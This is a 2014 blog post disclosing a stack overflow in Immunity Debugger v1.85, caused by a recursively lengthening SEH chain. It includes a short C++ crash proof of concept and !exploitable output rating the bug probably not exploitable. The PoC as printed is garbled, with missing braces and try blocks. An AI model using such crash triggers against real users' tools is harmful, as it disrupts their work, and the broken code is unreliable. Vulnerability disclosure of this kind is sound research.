Pages - Menu

Thursday, March 20, 2014

Immunity Debugger Stack Overflow Vulnerability – PoC

It's not always possible to find vulnerabilities or even zero days after using methods of reverse engineering or fuzzing, but this time I was super lucky. 2 months ago, I was studying Corelan’s article about heap spray exploitation which is a great one. During the study, while I was debugging Internet Explorer 7, Immunity Debugger (the last version, 1.85) has crashed and WinDBG handled the exception. I was really surprised.

When I looked back to determine what caused it to crash, I noticed that SE-Handler was recursively added to its SEH chain. Because SEH chain was created on stack segment and SEH chain was too long, this caused a stack overflow and Immunity Debugger crashed.

After realizing the cause of the crash, I quickly wrote a dirty PoC code to trigger the stack overflow vulnerability. The following PoC code creates try-catch blocks to overflow the stack.

/* ==================================================
Filename :  Crash_POC.cpp

Title : Immunity Debugger – Crash POC
Name: Immunity Debugger v1.85 SEH Chain Stack Overflow
Discoverer: Veysel HATAŞ (
Vendor: Immunity Inc   
Systems Affected: Windows
Risk: Low
Status: Not Fixed

Discovered: 05 January 2014
Reported: 06 January 2014
Published: 20 March 2014

Description: Immunity Debugger V1.85 contains stack overflow vulnerability in //its SEH chain mechanism

=================================================== */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int g_Count;

void foo(char *data);

int main(int argc, char* argv[])
      g_Count = 0;

      return 0;

void foo(char *data)
      char salla[10];

      printf("Deneme - %d\n", g_Count);

      if (g_Count == 510){
            strcpy(salla, data);

      catch(int e){
            printf("Error code is : %d", e);

It was tested on Windows 7 and Windows XP. In both of them, DEP protection was disabled.

When I look at the following !exploitable output, it is stated that this vulnerability is not exploitable. 

0:000> !exploitable
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Read Access Violation near NULL starting at ImmunityDebugger!Addsorteddata+0x0000000000000069 (Hash=0xa84b56c5.0x36b8c4de)
This is a user mode read access violation near null, and is probably not exploitable. 

This vulnerability was reported to the Immunity to on 06 January 2014.

No comments:

Post a Comment